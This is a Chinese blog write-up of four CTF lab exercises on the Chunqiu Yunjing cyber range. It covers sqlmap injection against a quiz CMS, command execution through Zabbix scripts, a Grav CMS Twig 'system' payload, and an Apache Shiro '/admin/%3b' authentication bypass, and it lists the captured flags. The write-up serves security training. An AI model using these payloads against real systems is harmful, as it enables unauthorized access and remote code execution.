#禁止右键复制模块,去掉下面的/*注释可使用#

春秋云镜靶场系列1

春秋云镜靶场系列

春秋云境.com是永信至诚基于多年来在网络靶场领域的深厚技术及场景积累,以春秋云底层能力为基础,以平行仿真技术为支撑,以高仿真内容场景为核心,打造网络安全实战“元宇宙”,通过更加多元、开放、创新的线上技术交流空间,广泛支撑个人、企业、学校、科研院所等各类社会群体和组织在线进行网络安全学习、能力认证、漏洞研究、综合渗透、案例复现、竞赛演练等。

平台设计了漏洞靶标和仿真场景两大体系,为用户提供实战化、体系化的渗透测试体验。其中,漏洞靶标多为历史CVE漏洞以及国内热点漏洞,涵盖浏览器、数据库、网络设备、Web等方向,用户可以根据自身培训、验证等需求,实时复现漏洞场景;仿真场景均源于真实网络安全案件、大型攻防演练等实战场景,具备独特剧情及技术点,仿真度高、实战性强、技术内容深,饕餮技术盛宴系统化淬炼网络安全实战思维。值得一提的是,这些专业靶场场景均由霄壤实验室、一线实战专家及国内TOP CTF战队高手设计制作,可满足各阶段爱好者的学习需求,为更广泛的用户群体提供更轻量的靶场体验,助力攻防两端的实战技能提升

 

靶场地址 https://yunjing.ichunqiu.com/

 

第一章. CVE-2022-32991(Web Based Quiz System SQL注入)

1.1. 靶标介绍:

 

该CMS的welcome.php中存在SQL注入攻击

1.2. 靶场复现

进入靶场发现登录页面尝试注册登录

 

 

 

登录后随便选择一个选项进入

 

当然是128了。不过我们不是来做题的。

 

根据题目提醒SQL注入的注入点在edi参数,需要F12使用cookie注入。

 

PHPSESSID=1nblg0fthd76cbfe7n04mhjift

接下来就是老规矩拿到SQLMAP中进行注入,获取数据库以及flag。

sqlmap -u "" --cookie="" --dbs --random-agent -p eid --batch

---

-u url

--dbs 获取数据库

--cookie 指定cookie信息

--random-agent 随机UserAgent

-p 指定参数

--batch 全自动默认注入

 

获取数据表

sqlmap -u "" --cookie="" -D ctf --tables --random-agent -p eid –batch

 

获取数据列名

 

这flag不就出来了吗?

sqlmap -u "" --cookie="" -D ctf -T flag -C flag --dump  --random-agent -p eid –batch

 

flag{c0d1678d-d095-4308-8eef-c2bffd493de5}

第二章. CVE-2022-23134

2.1. 靶标介绍:

Zabbix Sia Zabbix是拉脱维亚Zabbix SIA(Zabbix Sia)公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。 Zabbix 存在安全漏洞,该漏洞源于在初始设置过程之后,setup.php 文件的某些步骤不仅可以由超级管理员访问,也可以由未经身份验证的用户访问。

2.2. 靶场复现

默认账号Admin 默认密码为zabbix

 

 

依次点击Administration---scripts,再点击ping,然后 Commands 填写执行的命令:cat ../../../../../../flag

 

填写好之后update一下,然后到Monitoring----Maps要触发命令

 

点击ping之后得到flag,实际上就是将其ping命令修改成自己想要的命令。

 

flag{c9b301cb-bb77-4b7b-97dc-c3f4c78bb1c9}

第三章. CVE-2022-2073

3.1. 靶标介绍:

Grav CMS 可以通过 Twig 来进行页面的渲染,使用了不安全的配置可以达到远程代码执行的效果,影响最新版 v1.7.34 以下的版本

3.2. 靶场复现

 

提示需要建立一个管理员管理该插件,建议密码Admin*2023

 

依次点击pages---home。然后输入playload:{{['cat\x20/flag']|filter('system')}}

 

回到首页 成功获取flag

 

flag{2c2845a5-8e5d-4df2-87d6-5af6798c44b9}

第四章. CVE-2020-13933

4.1. 靶标介绍:

Apahce Shiro 由于处理身份验证请求时出错 存在 权限绕过漏洞,远程攻击者可以发送特制的HTTP请求,绕过身份验证过程并获得对应用程序的未授权访问。

4.2. 靶场复现

 

根据提示flag在admin下,又因为是未授权,想到抓包修改,啥内容都不用填,直接抓包,然后修改GET / HTTP/1.1修改为GET /admin/%3b HTTP/1.1

重发即可得到flag.

 

flag{070dcf68-31cd-4da0-8573-4b1a67a0fbaf}

posted @ 2023-07-24 22:49  Hndreamer  阅读(298)  评论(0编辑  收藏  举报
#百度统计#